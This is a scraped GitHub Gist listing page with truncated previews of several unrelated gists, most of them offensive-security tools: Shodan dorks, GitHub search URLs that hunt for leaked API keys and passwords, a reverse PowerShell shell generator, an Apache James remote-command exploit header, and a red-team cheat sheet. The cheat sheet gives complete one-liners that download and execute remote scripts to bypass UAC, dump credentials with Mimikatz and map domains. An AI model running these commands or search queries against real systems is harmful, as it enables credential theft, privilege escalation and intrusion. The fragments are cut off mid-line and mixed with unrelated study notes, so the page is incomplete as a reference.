JoyGhoshs
/ shodan-dorks.txt
Created
October 2, 2021 14:06
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| hostname:target.com | to find all asset available for target.com on shodan | |
| http.title:"title" | to find server/host with similer title | |
| http.html:"/file" | to find server/host with similar path | |
| html:"context" | to find server/host with similar string | |
| server: "apache 2.2.3" | to find server/host with same server | |
| port:80 | to find server/host with same port | |
| os:"windows" | to find server/host with same os | |
| asn:AS3214 | to find host/server with matched asn | |
| http.status:200 | to find server/host with 200 http response code | |
| http.favicon.hash:"hash" | to find server/host with same favico hash |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "proxy":{ | |
| "ssl_pass_through":{ | |
| "automatically_add_entries_on_client_ssl_negotiation_failure":false, | |
| "rules":[ | |
| { | |
| "enabled":true, | |
| "host":".*\\.google\\.com", | |
| "protocol":"any" | |
| }, |
nullenc0de
/ auto_git_query
Last active
January 7, 2025 15:10
Automated Github Queries (Can open 29 tabs at a time)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://github.com/search?q=BROWSER_STACK_ACCESS_KEY= OR BROWSER_STACK_USERNAME= OR browserConnectionEnabled= OR BROWSERSTACK_ACCESS_KEY=&s=indexed&type=Code | |
| https://github.com/search?q=CHROME_CLIENT_SECRET= OR CHROME_EXTENSION_ID= OR CHROME_REFRESH_TOKEN= OR CI_DEPLOY_PASSWORD= OR CI_DEPLOY_USER=&s=indexed&type=Code | |
| https://github.com/search?q=CLOUDAMQP_URL= OR CLOUDANT_APPLIANCE_DATABASE= OR CLOUDANT_ARCHIVED_DATABASE= OR CLOUDANT_AUDITED_DATABASE=&s=indexed&type=Code | |
| https://github.com/search?q=CLOUDANT_ORDER_DATABASE= OR CLOUDANT_PARSED_DATABASE= OR CLOUDANT_PASSWORD= OR CLOUDANT_PROCESSED_DATABASE=&s=indexed&type=Code | |
| https://github.com/search?q=CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN= OR CONTENTFUL_TEST_ORG_CMA_TOKEN= OR CONTENTFUL_V2_ACCESS_TOKEN=&s=indexed&type=Code | |
| https://github.com/search?q=-DSELION_BROWSER_RUN_HEADLESS= OR -DSELION_DOWNLOAD_DEPENDENCIES= OR -DSELION_SELENIUM_RUN_LOCALLY=&s=indexed&type=Code | |
| https://github.com/search?q=ELASTICSEARCH_PASSWORD= OR ELASTICSEARCH_USERNAME= OR EMAIL_NOTIFI |
tothi
/ mkpsrevshell.py
Created
February 17, 2019 00:05
reverse PowerShell cmdline payload generator (base64 encoded)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # | |
| # generate reverse powershell cmdline with base64 encoded args | |
| # | |
| import sys | |
| import base64 | |
| def help(): | |
| print("USAGE: %s IP PORT" % sys.argv[0]) |
jivoi
/ RedTeam_CheatSheet.ps1
Created
July 14, 2018 14:52
— forked from m8sec/RedTeam_CheatSheet.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Description: | |
| # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| # Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| # Import Mimikatz Module to run further commands |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Domain Recon | |
| ## ShareFinder - Look for shares on network and check access under current user context & Log to file | |
| powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt" | |
| ## Import PowerView Module | |
| powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')" | |
| ## Invoke-BloodHound for domain recon | |
| powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| *Original intruction material by Dr. Barbara Oakley and Dr. Terrence Sejnowski as part of their MOOC "Learning How to Learn" available via Coursera (August 2017) | |
| *Notes by Amir Saleh (not me) who shared his notes accessible via the discussion forums (https://docs.google.com/document/d/1GVYaVOVT2G9MS6ku6tLjhvoMazh7rWdqUu0Kts5C3Fc/edit) | |
| *Reproduced per the paraphrasing rule outlined in the course FAQ: | |
| *"We're often asked whether it's okay to use illustrations or quoted material from the course or book in your final project. It's perfectly possible to use illustrations from the course or book, but please cite where you got them, with the copyright information. If you quote anything from the video clips or the book A Mind for Numbers, you'll put it in quotation marks and cite where you got it. If you paraphrase information from the video clips or A Mind for Numbers--that is, you put things in your own words--then there's no need to put in a reference, although it would be nice to put some sort of general referenc |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
numberwhun
/ Penetration testing sample test cases
Created
July 2, 2016 03:21
Penetration testing sample test cases
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Penetration testing sample test cases (test scenarios): | |
| Remember this is not functional testing. In Pentest your goal is to find security holes in the system. Below are some generic test cases and not necessarily applicable for all applications. | |
| 1) Check if web application is able to identify spam attacks on contact forms used in the website. | |
| 2) Proxy server – Check if network traffic is monitored by proxy appliances. Proxy server make it difficult for hackers to get internal details of the network thus protecting the system from external attacks. | |
| 3) Spam email filters – Verify if incoming and outgoing email traffic is filtered and unsolicited emails are blocked. Many email clients come with in-build spam filters which needs to be configured as per your needs. These configuration rules can be applied on email headers, subject or body. | |
| 4) Firewall – Make sure entire network or computers are protected with Firewall. Firewall can be a software or hardware to block unauthorized access to system. Firewall can p |
kjiwa
/ apache-james-exploit.py
Last active
December 8, 2022 08:50
An exploit for Apache James 2.3.2 that executes remote commands. https://crimsonglow.ca/~kjiwa/2016/06/exploiting-apache-james-2.3.2.html
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """An exploit for Apache James 2.3.2 that executes remote commands. | |
| This script creates a new user and enqueues a payload to be executed the next | |
| time a user logs in to the machine. The vulnerability is documented in | |
| CVE-2015-7611. | |
| For more details, see http://www.securityfocus.com/bid/76933 and | |
| https://www.exploit-db.com/exploits/35513/. | |
| """ |
NewerOlder